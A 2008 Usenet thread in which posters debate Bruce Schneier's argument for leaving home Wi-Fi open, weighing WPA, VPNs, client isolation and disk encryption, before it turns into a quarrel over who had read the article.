of the few real data security breaches I've had to deal with in
perhaps 25 years of playing repairman, the serious ones were from
insider hacking, theft of backup media, and outright theft of the
entire system. My current worries are about key loggers, trojans, and
defective software upgrades.
>See Bill Cheswick's paper on the design of Internet gateways
>(which a wireless access point can ultimately be) for another
>(compatible) explanation (that predates wireless networking; although
>the details of the technology have changed, the points are still valid,
>and on a broad scale we have not yet appeared to have learned them):
>http://www.cheswick.com/ches/papers/gateway.pdf
I read that 20 years ago. As you note, it's still valid. I'm
undecided as to whether it's better to protect the data or control
access. Since some of the problems I've had were from inside employee
hacking, I'm drifting toward protecting the data, and doing a minimal
effort on controlling access, permissions, etc. Dunno. I'm not a
security expert, just a repairman.
>> The part about leaving the car door open is called an analogy. Leave
>> the WPA security disabled because it might be cracked.
>
>That isn't at all Scheier's point. Leave WPA disabled, because he
>prefers to share the network access.
I again beg to differ. If that was his point, he shouldn't have
bothered to mention that WPA and all such security protocols would
eventually be cracked. He could have said something like "WPA works
and should be used. However, I prefer....etc". Instead, he implies
that WPA *MIGHT* be cracked, and uses that as justification for
running an open network. I honestly don't care why or how he runs his
open network. It's bad advice for the general public, most of whom
fail to appreciate the risks and implications.
>And by the way, even if WPA is
>considered a suitable way to secure access to your network at the momen,
>don't count on it to secure the data on your computer.
Ummm... it secures the data transport, not the computer. Now, if you
wanted to encrypt the entire drive, that might be useful to discourage
those that run open shares (public directories) on their laptops
because it's convenient.
>Referring back
>to my earlier analogy, that would be like counting on the locked gate at
>the end of the street to protect your home from being entered by
>unwelcome strangers.
I don't see the connection, as WPA only protects the vehicle that gets
you in and out of your gated community.
>He's not worrying about securing his wireless network because he's
>comfortable with how well the computers he has on that network are
>secured.
Good. I'm sure he also uses a VPN and SSH to talk to his work
computers. Great idea, but somehow missing in his article advocating
running an unencrypted network.
>The effort he invested in securing his computers is returned
>to him in his ability to not worry about the odd stranger using his
>wireless network (as someone might take a walk down the street of a
>gated community).
I would be worried if he' not worried. Most real security experts
that I know, are constantly worried about this or that threat. Every
time there's a new exploit announced, there's a flurry of nervous
activity. I had one such expert bail out in the middle of lunch when
someone detailed a new exploit that he hadn't heard about. I pay
security experts to be worried.
>Now, having said all of that, I keep my own wireless network secured,
>but all the computers I have that either use it, or are accessible from
>it, also are secured as well as they can be. I don't count on the
>wireless security to protect my computers, but I do expect that it will
>keep most uninvited strangers from using my network.
Again, wireless security (WPA) will not protect your computer. It
will protect your network from sniffing.
Incidentally, many of the laptops that people are buying have a built
in fingerprint reader. I think I've delivered about 3 of these in the
last few months. In all 3 cases, I set it up for using the
fingerprint reader, including showing the owner how to use it, and
training it for several of their fingers. 2 months later, none of
them are using the reader, and are instead using the backdoor
password, which in one case, was prominently displayed on a post-it
note. So much for improved access security.
>On Fri, 28 Nov 2008 16:18:57 -0500, John Mason Jr
>So, why does he recommend *LESS* wireless security? Did I miss
>something here?
Perhaps he's just being provocative.
>> "If I configure my computer to be secure regardless of the network
>>it's on, then it simply doesn't matter. And if my computer isn't secure
>>on a public network, securing my own network isn't going to reduce my
>>risk very much.
>
>Baloney. I could have an adquately secured computah (personal
>firewall) and still have problems. For example, sending un-encrypted
>email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
>or an ethernet tap. The computer is secure, but the transport
>mechanism is not.
Amen. You have to run VPN to secure traffic on an open wireless
network, and it's much more cost and hassle to set up VPN than to
configure WPA.
>>Did you read the article?
>
>No, I was responding to what you wrote, not to what someone wrote in
>an article. You didn't make it clear that I had to read the article
>before climbing onto the ride. :)
Methinks you might find it useful to read the article before
attempting to criticize my interpretation of the article:
<http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
Enough ranting about security. I'm out of time.
>Jeff Liebermann wrote:
>> So, why does he recommend *LESS* wireless security? Did I miss
>> something here?
>
>In part of the article he states he doesn't believe that it is much of a
>risk that his wireless will be abused
There's ample evidence that open wireless will be abused, with
potentially negative consequences. All it takes is for the kid next
door to use your wireless to file share illicit materials (imagine
that); the RIAA and MPAA trace it back to your account; your computers
get seized and you get sued.
>> Baloney. I could have an adquately secured computah (personal
>> firewall) and still have problems. For example, sending un-encrypted
>> email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
>> or an ethernet tap. The computer is secure, but the transport
>> mechanism is not.
>
>I would consider fixing those type of problems part of making sure that
>your computer is safe on a public network.
It's a whole lot easier to run WPA than VPN.
>The network access point (wireless or otherwise) provides access to the
>network, not "security". That's the point I read in the article being
>discussed.
That would not be a valid point -- WPA does provide real and valuable
security. It's called Defense in Depth:
<http://en.wikipedia.org/wiki/Defense_in_Depth_(computing)>
If Bruce wasn't being provocative, he should be embarrassed and ashamed.
If you want to run open wireless as a public service, then you should
ideally use a wireless router than can strictly segregate the open
wireless from your private wireless and wired networks (e.g.,NETGEAR
WG302), but unfortunately that's only available in relatively expensive
wireless routers (AFAIK).
An alternative is to run two wireless routers, one for yourself secured
with WPA, and one for the public unsecured, each with DHCP handing out
different blocks of private addresses, and isolate them from each other
with VLANs that allow each of them to connect to the Internet but not to
each other; e.g.,
Internet
|
+-------+--------+
|Private Wireless|
| Router with |
| VLAN isolation |
| (e.g., DD-WRT) |
+------------+---+
|
+-----+
|
+----+----+
|Public |
|Wireless |
|Router |
+---------+
>My house is private, it's not a hotel or a motel or a brothel or a
>Starbucks and I have a very secure WPA password. If we have guest want
>to use it, I give them the password. It's pretty simple really. The
>next-door neighbour who I trust fully also has the password in case his
>network goes down; he does the same for me (he's using WEP which I can
>crack if I want anyway). Although, we have the same ISP, so it's kind of
>a useless exercise in neighbourly admiration.
Simple but dangerous. Once the PSK (pre-shared key) is shared, it's
compromised -- you have no control over what those people will do with
it.
Worse, wireless sessions with PSK are *not* protected from each other,
so wireless traffic can be snooped by anyone with the PSK, intentionally
or otherwise (think infected computer).
Better to run WPA Enterprise, which allows you to hand out unique
credentials to anyone. Authentication options include ZyXEL G-2000 Plus
(wireless router with built-in PEAP server)
<http://www.zyxel.com/web/product_family_detail.php?PC1indexflag=20040520161313&CategoryGroupNo=1FD9B843-06BE-448D-B770-5383D40CD32E>
>On Sat, 29 Nov 2008 07:45:35 +0000 (UTC), Sylvain Robitaille
><s...@alcor.concordia.ca> wrote:
>>However, his point is that trying to protect the data
>>on the computer by attempting to secure access to the network is the
>>wrong way to go about it (and in some cases might be seen as duplicated
>>effort).
>
>Yep. One of my former (not current) HIPAA customers uses an encrypted
>database. In theory, one should not be able to view or extract useful
>data without authorization and authentication. I demonstrated that I
>could steal the entire drive, transplant it into a different machine,
>and have access to all the data. They were not thrilled, especially
>since some of their RAID array was missing. I'll spare you my opinion
>of their security and software provider.
That's why I'm a big fan of hard disk passwords, and even better
encrypting hard disks. You could steal my laptop, but you'd not be able
to access any of the data on the hard disk (short of major forensic
cracking at least).
>I've had similar fiascos
>with USB keys, remote access software, and of course, wireless. Also,
>of the few real data security breaches I've had to deal with in
>perhaps 25 years of playing repairman, the serious ones were from
>insider hacking, theft of backup media, and outright theft of the
>entire system. My current worries are about key loggers, trojans, and
>defective software upgrades.
Agreed.
>I read that 20 years ago. As you note, it's still valid. I'm
>undecided as to whether it's better to protect the data or control
>access. Since some of the problems I've had were from inside employee
>hacking, I'm drifting toward protecting the data, and doing a minimal
>effort on controlling access, permissions, etc. Dunno. I'm not a
>security expert, just a repairman.
Likewise.
>... He could have said something like "WPA works
>and should be used. However, I prefer....etc". Instead, he implies
>that WPA *MIGHT* be cracked, and uses that as justification for
>running an open network. ...
It's a bit like saying, condoms sometimes fail, so don't bother to use
them. Really, really stupid. I'm sure he knows better.
>... Now, if you
>wanted to encrypt the entire drive, that might be useful to discourage
>those that run open shares (public directories) on their laptops
>because it's convenient.
Nope. Once the computer is running the drive is unlocked.
>Again, wireless security (WPA) will not protect your computer. It
>will protect your network from sniffing.
WPA does protect your computer from attack over the wireless network.
<snip>
> The part about leaving the car door open is called an analogy. Leave
> the WPA security disabled because it might be cracked. Leave the car
> unlocked because the door locks might be picked. All analogies break
> down under sufficient scrutiny, but methinks these are sufficiently
> close to survive.
<snip>
In my experience, I find it far better to leave the car's doors unlocked
(especially when it is likely to experience a break-in) than have to
endure the damage caused by forced entry and subsequent costs of repair.
Just make sure not to leave valuables in the car. Likewise with an
open access point - provide nothing of value to the intruder and provide
advertisement about your network, website, etc. in the event of
a visitor.
>
> Did you read the article? Bruce Schneier never actually came out and
> recommended that one should not use wireless security. Yet the entire
> article is all about how wonderful and easy things are without that
> horribly difficult wireless security, and how successful he and others
> have been running wide open system.
<snip>
I have not read the article but I tend to agree that association and joining
of a wireless network in a residential or public space is best done wide
open, with the security at other layers, rather than at the access point.
In a mission-critical wireless network however, good security for joining
the network may be needed if even just for bandwidth management.
Michael
>That's why I'm a big fan of hard disk passwords, and even better
>encrypting hard disks. You could steal my laptop, but you'd not be able
>to access any of the data on the hard disk (short of major forensic
>cracking at least).
I'm lazy. I just keep my major files and apps on a USB drive:
<http://portableapps.com>
The important files are individually encrypted. I tried using the
encryption utilities that came with the drive, but had problems. The
big problem is that the USB flash drive is much slower than a hard
disk. That's a problem when Firefox has to load and index a zillion
email messages.
>It's a bit like saying, condoms sometimes fail, so don't bother to use
>them. Really, really stupid. I'm sure he knows better.
I dunno. I looked carefully at his writing style. Besides the
previously mentioned revealing slip (double negative), I see at least
3 different sentence styles and 4 different paragraph structures. It
kinda looks like this is a conglomeration of several articles, with
heavy editing by the Wired Magazine editors. It might even be
possible that someone else added that paragraph. Dunno, but sad.
>>Again, wireless security (WPA) will not protect your computer. It
>>will protect your network from sniffing.
>
>WPA does protect your computer from attack over the wireless network.
I use the routers "AP isolation" feature (which is actually client
isolation) to keep the connected client laptops from both seeing and
attacking each other. You could be running a totally insecure laptop,
with wide open shares, and still be safe from wireless attack in a
coffee shop. However, that does nothing to prevent wireless sniffing.
> On Fri, 28 Nov 2008 19:24:04 -0800, Jeff Liebermann <je...@cruzio.com>
<snip>
> Amen. You have to run VPN to secure traffic on an open wireless
> network, and it's much more cost and hassle to set up VPN than to
> configure WPA.
But IMHO a preferred solution for all types of networks susceptible
to snooping. I prefer an open WAP with all private traffic over
encrypted tunnels and public access for strangers with various
advisories available in html, ftp, etc. advising terms of use.
Bandwidth controls may need to be implemented separately to handle
DoS attacks.
Michael
> He's not worrying about securing his wireless network because he's
> comfortable with how well the computers he has on that network are
> secured.
Then his article is highly disingenuous, or he really is a fool. Does he
run an encrypted VPN between every computer on his network? Is all
traffic to the internet encrypted, including email?
And more to hte point, does he explain in the article that you need to
do all this stuff, and explain how to do it? Er, no. He leaves that as
an exercise to the reader. Or, perish the thought, perhaps he would
quite like them to call his firm to ask for professional help setting it
up.
> The effort he invested in securing his computers is returned
> to him in his ability to not worry about the odd stranger using his
> wireless network (as someone might take a walk down the street of a
> gated community).
And presumably his ISP doesn't have a policy against it.
Just one other question - is Bruce also blase about the odd
porn-merchant and spammer using his connection? If so, we know exactly
how valuable his advice is.
Sure, its unlikely. There are 500,000 compromised PCs currently trying
to reconnect to a spam hub after McColo was taken out, I expect their
owners /also/ thought the risk were too low to worry about. They were
wrong.
>On Sat, 29 Nov 2008 11:49:01 -0800, John Navas
><spamf...@navasgroup.com> wrote:
>
>>That's why I'm a big fan of hard disk passwords, and even better
>>encrypting hard disks. You could steal my laptop, but you'd not be able
>>to access any of the data on the hard disk (short of major forensic
>>cracking at least).
>
>I'm lazy. I just keep my major files and apps on a USB drive:
><http://portableapps.com>
>The important files are individually encrypted. I tried using the
>encryption utilities that came with the drive, but had problems. The
>big problem is that the USB flash drive is much slower than a hard
>disk. That's a problem when Firefox has to load and index a zillion
>email messages.
I'm lazy too. My primary fast hard disk is unlocked by the same
password that unlocks my computer. Couldn't be easier or faster.
>>>Again, wireless security (WPA) will not protect your computer. It
>>>will protect your network from sniffing.
>>
>>WPA does protect your computer from attack over the wireless network.
>
>I use the routers "AP isolation" feature (which is actually client
>isolation) to keep the connected client laptops from both seeing and
>attacking each other. You could be running a totally insecure laptop,
>with wide open shares, and still be safe from wireless attack in a
>coffee shop. However, that does nothing to prevent wireless sniffing.
Fair enough, but WPA does nonetheless protect your computer against
wireless attack, with the caveat that you're not protected from wireless
clients using the same PSK.
If you did that in a car-park in the UK, you'd almost certainly return
to an empty space and your car would be on its way to Nigeria.
> (especially when it is likely to experience a break-in) than have to
> endure the damage caused by forced entry and subsequent costs of repair.
A mate of mine did that - he had a soft-top TVR and it was very costly
to fix the hood. Car never got nicked because it was LHD and a pig to
drive.
>Jeff Liebermann wrote:
>
>> The part about leaving the car door open is called an analogy. Leave
>> the WPA security disabled because it might be cracked. Leave the car
>> unlocked because the door locks might be picked. All analogies break
>> down under sufficient scrutiny, but methinks these are sufficiently
>> close to survive.
>In my experience, I find it far better to leave the car's doors unlocked
>(especially when it is likely to experience a break-in) than have to
>endure the damage caused by forced entry and subsequent costs of repair.
>Just make sure not to leave valuables in the car. Likewise with an
>open access point - provide nothing of value to the intruder and provide
>advertisement about your network, website, etc. in the event of
>a visitor.
Simply running a wireless network is an advertisement, and even with
encrypted tunnels your computers are still open to attack unless you
also have wireless to wireless isolation (along with wireless to wired
isolation if you have wired computers as well). You otherwise increase
your vulnerability substantially.
>> Did you read the article? Bruce Schneier never actually came out and
>> recommended that one should not use wireless security. Yet the entire
>> article is all about how wonderful and easy things are without that
>> horribly difficult wireless security, and how successful he and others
>> have been running wide open system.
>I have not read the article ...
Then with all due respect you really shouldn't be commenting.
> On Sat, 29 Nov 2008 15:53:00 -0600, msg <msg@_cybertheque.org_> wrote in
> <adqdnRzM59k0JKzU...@posted.cpinternet>:
>
>
>>Jeff Liebermann wrote:
>>
>>
>>>The part about leaving the car door open is called an analogy. Leave
>>>the WPA security disabled because it might be cracked. Leave the car
>>>unlocked because the door locks might be picked. All analogies break
>>>down under sufficient scrutiny, but methinks these are sufficiently
>>>close to survive.
>
>
>>In my experience, I find it far better to leave the car's doors unlocked
>>(especially when it is likely to experience a break-in) than have to
>>endure the damage caused by forced entry and subsequent costs of repair.
>>Just make sure not to leave valuables in the car. Likewise with an
>>open access point - provide nothing of value to the intruder and provide
>>advertisement about your network, website, etc. in the event of
>>a visitor.
>
>
> Simply running a wireless network is an advertisement, and even with
> encrypted tunnels your computers are still open to attack unless you
> also have wireless to wireless isolation (along with wireless to wired
> isolation if you have wired computers as well). You otherwise increase
> your vulnerability substantially.
Please elaborate what forms of attack you consider likely here and why
segment isolation is indicated? When the only routes available to
the stranger wireless client are directed to an isolated honeypot that
serves as an advertisement vehicle (not SSID adverts, but real html, text,
etc. adverts and terms of use statements), and useful routes are only
accessible through the tunnels (IPSec), what attack do you anticipate?
As for 'internal' security, (on the VPN, VLANS, etc), that is a matter
for policy decisions on the internal network and not in the domain of
wireless security
>
>>>Did you read the article? Bruce Schneier never actually came out and
>>>recommended that one should not use wireless security. Yet the entire
>>>article is all about how wonderful and easy things are without that
>>>horribly difficult wireless security, and how successful he and others
>>>have been running wide open system.
>
>
>>I have not read the article ...
>
>
> Then with all due respect you really shouldn't be commenting.
Huh? If you quoted my full statement in context you would see that I am
agreeing with a proposition of the quoted poster, not something from the
'unread' article.
Michael
Quite!
I've read it and the final para does actually say "In my opinion,
securing my wireless network isn't worth it." which has an obvious
unspoken continuation.
"I don't bother to secure my network, and I'm a security /expert/ so...."
>John Navas wrote:
>> Simply running a wireless network is an advertisement, and even with
>> encrypted tunnels your computers are still open to attack unless you
>> also have wireless to wireless isolation (along with wireless to wired
>> isolation if you have wired computers as well). You otherwise increase
>> your vulnerability substantially.
>
>Please elaborate what forms of attack you consider likely here and why
>segment isolation is indicated? When the only routes available to
>the stranger wireless client are directed to an isolated honeypot
I saw nothing about this in your earlier post. Are you scrambling? ;)
Regardless, how exactly is this set up?
>that
>serves as an advertisement vehicle (not SSID adverts, but real html, text,
>etc. adverts and terms of use statements), and useful routes are only
>accessible through the tunnels (IPSec), what attack do you anticipate?
Any of the myriad of possible attacks.
>As for 'internal' security, (on the VPN, VLANS, etc), that is a matter
>for policy decisions on the internal network and not in the domain of
>wireless security
I disagree -- it's all one network.
"Those who cannot remember the past are condemned to repeat it."
-George Santayana
On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
<notv...@cox.net.invalid> wrote in <ggpgmh$j7u$1...@nntp.motzarella.org>:
>Interesting counter point to securing your wireless
>
><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>
>John
>
>
>John Navas wrote:
>> <http://wireless.navas.us/wiki/Wi-Fi#Essential_Checklist>
>>
>> * Use WPA security. If you don't do this, assume you will get hacked.
>> WEP is essentially worthless. Replace wireless equipment that doesn't
>> support WPA. Seriously. (See Wi-Fi Security)
>>
>> * Use a strong WPA passphrase. A good way to do that is with diceware
>> words. (See What Makes for a Strong Password or Passphrase?) Write your
>> passphrase on a label and stick it on the bottom of your wireless router
>> so you won't forget it. (If someone gets to your wireless router, you
>> are compromised regardless.)
>>
>> * Make your wireless SSID unique. This helps avoid network collisions. A
>> good way to do this is to use your address, phone number, and/or name
>> for your SSID (making it easy for you to be contacted if something is
>> wrong with your wireless network).
>>
>> * Don't bother with SSID hiding or MAC address filtering. They don't do
>> any real good (improve security) but they can cause you grief. (See
>> Wi-Fi Security Myths)
>>
>> * Turn off Universal Plug and Play (UPnP) in your wireless router.
>> Because most consumer-grade wireless routers lack UPnP authentication
>> they are vulnerable to attack. (See Problems with UPnP, Lack of
>> Authentication)
>>
>> * Set a strong password on the administration interface of your wireless
>> router. Again, diceware is a good way to do that.
>>
>> * Turn off remote administration. If your wireless router supports
>> remote administration, turn it off (unless you really know what you're
>> doing).
>>
>> * On unsecured Wi-Fi use VPN (Virtual Private Networking). Otherwise
>> your wireless traffic can be snooped and compromised. (See Secure
>> Internet access in a public hotspot)
> As for 'internal' security, (on the VPN, VLANS, etc), that is a matter
> for policy decisions on the internal network and not in the domain of
> wireless security
Euh, thats the kind of approach that leads to costly customer data loss.
Security policy shouldn't be divided up into little empires.
> On Sat, 29 Nov 2008 17:11:09 -0600, msg <msg@_cybertheque.org_> wrote in
> <wvmdnYvABfFnVqzU...@posted.cpinternet>:
>
>
>>John Navas wrote:
>
>
>>>Simply running a wireless network is an advertisement, and even with
>>>encrypted tunnels your computers are still open to attack unless you
>>>also have wireless to wireless isolation (along with wireless to wired
>>>isolation if you have wired computers as well). You otherwise increase
>>>your vulnerability substantially.
>>
>>Please elaborate what forms of attack you consider likely here and why
>>segment isolation is indicated? When the only routes available to
>>the stranger wireless client are directed to an isolated honeypot
>
>
> I saw nothing about this in your earlier post. Are you scrambling? ;)
I configure my external wireless networks as I would any wired network,
anticipating, and even expecting and possibly suggesting that strangers
'plug in' to it (wired or wireless -- it shouldn't matter). Should I
design some ethernet scrambling technology too (at the physical layer)
<grin>?
> Regardless, how exactly is this set up?
The external wireless access points are on an IP subnet routed by an OpenBSD
border router which also is the head end for IpSEC and IKE from external
wireless; nothing else is on that subnet. Stranger clients get access
to a limited set of resources (for advertising purposes) such as http
to an internal server, DNS, DHCP, and IKE and VPN negotiation services;
all services are handled by port forwarding and in some cases internal
Natting. The address pool presented to the external client is RFC 1918;
stranger clients are welcome to browse the presented web pages, use the
bulletin board, or do other things as I see fit; the only security
issues for me here are at the service endpoints -- the user can sniff
all he wants and will only see this traffic or encrypted payloads from
VPN users.
>
>
>>that
>>serves as an advertisement vehicle (not SSID adverts, but real html, text,
>>etc. adverts and terms of use statements), and useful routes are only
>>accessible through the tunnels (IPSec), what attack do you anticipate?
>
>
> Any of the myriad of possible attacks.
>
>
>>As for 'internal' security, (on the VPN, VLANS, etc), that is a matter
>>for policy decisions on the internal network and not in the domain of
>>wireless security
>
>
> I disagree -- it's all one network.
I cannot imagine (in an unclassified network) imposing draconian network
level security on internal users; applications, database encryption, access
control etc. seems to me to be more appropriate at this level.
Michael
>On Sat, 29 Nov 2008 17:11:09 -0600, msg <msg@_cybertheque.org_> wrote in
><wvmdnYvABfFnVqzU...@posted.cpinternet>:
>
>>John Navas wrote:
>
>>> Simply running a wireless network is an advertisement, and even with
>>> encrypted tunnels your computers are still open to attack unless you
>>> also have wireless to wireless isolation (along with wireless to wired
>>> isolation if you have wired computers as well). You otherwise increase
>>> your vulnerability substantially.
>>
>>Please elaborate what forms of attack you consider likely here and why
>>segment isolation is indicated? When the only routes available to
>>the stranger wireless client are directed to an isolated honeypot
>
>I saw nothing about this in your earlier post. Are you scrambling? ;)
>Regardless, how exactly is this set up?
>
>>that
>>serves as an advertisement vehicle (not SSID adverts, but real html, text,
>>etc. adverts and terms of use statements), and useful routes are only
>>accessible through the tunnels (IPSec), what attack do you anticipate?
>
>Any of the myriad of possible attacks.
That's not the relevant question in any event.
The relevant question is: What attacks have you not anticipated?
The answer to that question is, of course, unknowable, which is part of
why it makes no sense to forgo the easy and substantial protection
afforded by securing the wireless network.
> On Sat, 29 Nov 2008 17:11:09 -0600, msg <msg@_cybertheque.org_> wrote in
> <wvmdnYvABfFnVqzU...@posted.cpinternet>:
>
>
>>John Navas wrote:
>
>
>>>Simply running a wireless network is an advertisement, and even with
>>>encrypted tunnels your computers are still open to attack unless you
>>>also have wireless to wireless isolation (along with wireless to wired
>>>isolation if you have wired computers as well). You otherwise increase
>>>your vulnerability substantially.
<snip>
> Regardless, how exactly is this set up?
I should point out that my open access networks are by choice and design to
encourage stranger connections; public access is part of the mission.
Michael
>John Navas wrote:
>> Regardless, how exactly is this set up?
>
>The external wireless access points are on an IP subnet routed by an OpenBSD
>border router which also is the head end for IpSEC and IKE from external
>wireless; nothing else is on that subnet. Stranger clients get access
>to a limited set of resources (for advertising purposes) such as http
>to an internal server, DNS, DHCP, and IKE and VPN negotiation services;
>all services are handled by port forwarding and in some cases internal
>Natting. The address pool presented to the external client is RFC 1918;
>stranger clients are welcome to browse the presented web pages, use the
>bulletin board, or do other things as I see fit; the only security
>issues for me here are at the service endpoints -- the user can sniff
>all he wants and will only see this traffic or encrypted payloads from
>VPN users.
Other security issues for you include mistakes you may have made, holes
you may have missed, and exploits in your equipment you may not know
about. There is no such thing as a secure network.
>> I disagree -- it's all one network.
>
>I cannot imagine (in an unclassified network) imposing draconian network
>level security on internal users; applications, database encryption, access
>control etc. seems to me to be more appropriate at this level.
WPA is anything but draconian.
>On Sat, 29 Nov 2008 03:02:07 -0600, Char Jackson <no...@none.invalid>
>wrote:
>
>>>Did you read the article?
>>
>>No, I was responding to what you wrote, not to what someone wrote in
>>an article. You didn't make it clear that I had to read the article
>>before climbing onto the ride. :)
>
>Methinks you might find it useful to read the article before
>attempting to criticize my interpretation of the article:
Again, I wasn't responding to the article. I was responding to you.
Without having read the article you know nothing about the context of
what he wrote.
>Again, I wasn't responding to the article. I was responding to you.
Three problems:
1. I hate one-line unsubstantiated comments (like this one).
2. How can you provide an informed opinion on my comments about
something you haven't read? You might comment on my style and logic,
but few readers care much about those. It's the validity of the sage
advice on wireless encryption, offered by a security expert, in a
widely destributed Wired Magazine article, that is important. If you
haven't read the article, I don't see how you can have an opinion
about the article's advice.
3. I suggest that you try really hard not to attack the person making
the comments and concentrate on the content. I kinda blew it with my
initial rant, for which I promised to resist the temptation to repeat
the mistake. If you haven't read the article, you know nothing of the
content.
I also avoided responding to your previous posting, which offered no
substantiation for any of your opinions, and only questioned my logic
and interpretations. With all due respect, I really don't care about
anyone's opinions. It's the logic and facts that they offer to
substantiate those opinions that I find interesting and useful.
For example, you asked:
>>Leave the WPA security disabled because it might be cracked.
>See? THAT! How did you arrive there? Besides you, who else suggested
>it would be a good idea to leave WPA disabled because it might be
>cracked? If not from you, did you get it from the article? That's
>really all I'm asking.
Instead of commenting on the validity of my interpretation, you
decided that it would be more fun to attack my logic. Do you really
need an answer as to how I derived my conclusion? How will that be
useful to anyone reading it? If my logic were defective, you couldn't
offer an alternative, surely without actually reading the article.
Like I said.... I hate security discussions.
Even if one could consider WPA 'draconian' you've obviously never worked
in a corporate environment.
You /really/ think that, say, a bank can run an open wifi hotspot with
access to its internal networks, in the middle of a large city,
surrounded by its competitors?
> applications, database encryption, access
> control etc. seems to me to be more appropriate at this level.
These are part of the answer, yes.
>On Sat, 29 Nov 2008 22:03:50 -0600, Char Jackson <no...@none.invalid>
>wrote in <q344j4pab14fvk1no...@4ax.com>:
>
>>On Sat, 29 Nov 2008 10:38:48 -0800, Jeff Liebermann <je...@cruzio.com>
>>wrote:
>>
>>>On Sat, 29 Nov 2008 03:02:07 -0600, Char Jackson <no...@none.invalid>
>>>wrote:
>>>
>>>>>Did you read the article?
>>>>
>>>>No, I was responding to what you wrote, not to what someone wrote in
>>>>an article. You didn't make it clear that I had to read the article
>>>>before climbing onto the ride. :)
>>>
>>>Methinks you might find it useful to read the article before
>>>attempting to criticize my interpretation of the article:
>>
>>Again, I wasn't responding to the article. I was responding to you.
>
>Without having read the article you know nothing about the context of
>what he wrote.
Thanks, but you're talking to the wrong person. Jeff wrote the OP and
he alone controlled its context.
>On Sat, 29 Nov 2008 22:03:50 -0600, Char Jackson <no...@none.invalid>
>wrote:
>
>>Again, I wasn't responding to the article. I was responding to you.
>
>Three problems:
>
>1. I hate one-line unsubstantiated comments (like this one).
>
>2. How can you provide an informed opinion on my comments about
>something you haven't read?
I read your comments. I commented on your comments. Why is that hard
to understand? I never claimed to be commenting on the article.
>If you haven't read the article, I don't see how you can have an
>opinion about the article's advice.
Good point. That's why I didn't offer an opinion about the article's
advice.
>3. I suggest that you try really hard not to attack the person making
>the comments and concentrate on the content. I kinda blew it with my
>initial rant, for which I promised to resist the temptation to repeat
>the mistake. If you haven't read the article, you know nothing of the
>content.
I haven't read the article. I know nothing of the content. That's why
I didn't comment on the content of the article.
OTOH, I read your OP, and I commented on what you wrote. That's all.
>I also avoided responding to your previous posting, which offered no
>substantiation for any of your opinions, and only questioned my logic
>and interpretations.
That's correct, I questioned your logic and interpretations. I still
do.
>Instead of commenting on the validity of my interpretation, you
>decided that it would be more fun to attack my logic.
What do you mean, 'instead of commenting on the validity of [your]
interpretations'? Just 2 lines above you seemed to understand that I
was questioning your (logic and) interpretations.
>Do you really need an answer as to how I derived my conclusion?
We're making progress. In your first response, you denied making a
conclusion. But yes, I was curious as to how you arrived where you
arrived, since your position didn't logically follow from what you
quoted in your OP.
>Like I said.... I hate security discussions.
I can see why.
No he didn't. John wrote the original post, you replied noting Bruce
Schier's contentious article, and Jeff was commenting on the article.
And to reiterate - since you admit to not having read the article, to
write a criticism of Jeff's comments on it seems.... arrogant.... for
want of a better word.
Yes you did - when you asserted that Jeff was either misinterpreting or
misrepresenting it.
>> If you haven't read the article, I don't see how you can have an
>> opinion about the article's advice.
>
> Good point. That's why I didn't offer an opinion about the article's
> advice.
But you did.
> I haven't read the article. I know nothing of the content. That's why
> I didn't comment on the content of the article.
if the above were true...
>> I also avoided responding to your previous posting, which offered no
>> substantiation for any of your opinions, and only questioned my logic
>> and interpretations.
>
> That's correct, I questioned your logic and interpretations. I still
> do.
... then you were in no position to do this. How can you possibly
question someone's intrepretation of something you've not read yourself?
No, strike that, it was a rhetorical question. Politicians do it all the
time, its called "making stuff up to suit a personal agenda".
There's no point debating this further tho - you've been caught in a lie
and are too bull-headed to admit you screwed up. Lesson learned.
>Char Jackson wrote:
>> On Sat, 29 Nov 2008 20:22:56 -0800, John Navas
>> <spamf...@navasgroup.com> wrote:
>>
>>> On Sat, 29 Nov 2008 22:03:50 -0600, Char Jackson <no...@none.invalid>
>>> wrote in <q344j4pab14fvk1no...@4ax.com>:
>>>
>>>> On Sat, 29 Nov 2008 10:38:48 -0800, Jeff Liebermann <je...@cruzio.com>
>>>> wrote:
>>>>
>>>>> On Sat, 29 Nov 2008 03:02:07 -0600, Char Jackson <no...@none.invalid>
>>>>> wrote:
>>>>>
>>>>>>> Did you read the article?
>>>>>> No, I was responding to what you wrote, not to what someone wrote in
>>>>>> an article. You didn't make it clear that I had to read the article
>>>>>> before climbing onto the ride. :)
>>>>> Methinks you might find it useful to read the article before
>>>>> attempting to criticize my interpretation of the article:
>>>> Again, I wasn't responding to the article. I was responding to you.
>>> Without having read the article you know nothing about the context of
>>> what he wrote.
>>
>> Thanks, but you're talking to the wrong person. Jeff wrote the OP and
>> he alone controlled its context.
>
>No he didn't. John wrote the original post,
You're right. I thought Jeff's "I'm late for a free lunch" post was
the start of the thread. I stand corrected.
>you replied noting Bruce
>Schier's contentious article, and Jeff was commenting on the article.
I didn't note any articles, I only commented on Jeff's conclusions,
with which I didn't agree.
>And to reiterate - since you admit to not having read the article, to
>write a criticism of Jeff's comments on it seems.... arrogant.... for
>want of a better word.
I don't understand why you'd feel that way, but I respect your opinion
and will give it all the consideration it deserves.
>Char Jackson wrote:
>> On Sat, 29 Nov 2008 20:52:11 -0800, Jeff Liebermann <je...@cruzio.com>
>> wrote:
>>
>>> 2. How can you provide an informed opinion on my comments about
>>> something you haven't read?
>>
>> I read your comments. I commented on your comments. Why is that hard
>> to understand? I never claimed to be commenting on the article.
>
>Yes you did - when you asserted that Jeff was either misinterpreting or
>misrepresenting it.
Nice try, but no cigar. It looks to me like Jeff quoted a bit from
that article, and then commented on it. I commented on his comments.
It looked to me like he was completely missing the point (of the part
that he quoted) and had come to a very faulty conclusion.
Would I have felt the same way if I had read the entire article? I
don't know, but if the answer is yes then Jeff did a poor job of
quoting from the article.
>>> If you haven't read the article, I don't see how you can have an
>>> opinion about the article's advice.
>>
>> Good point. That's why I didn't offer an opinion about the article's
>> advice.
>
>But you did.
I disagree. I don't even know what the article's advice was. What I
did comment on, (I feel like a broken record but a couple of folks
seem to be particularly thick), was Jeff's comments following his
quoted material.
>> I haven't read the article. I know nothing of the content. That's why
>> I didn't comment on the content of the article.
>
>if the above were true...
Do you see something that isn't true?
>>> I also avoided responding to your previous posting, which offered no
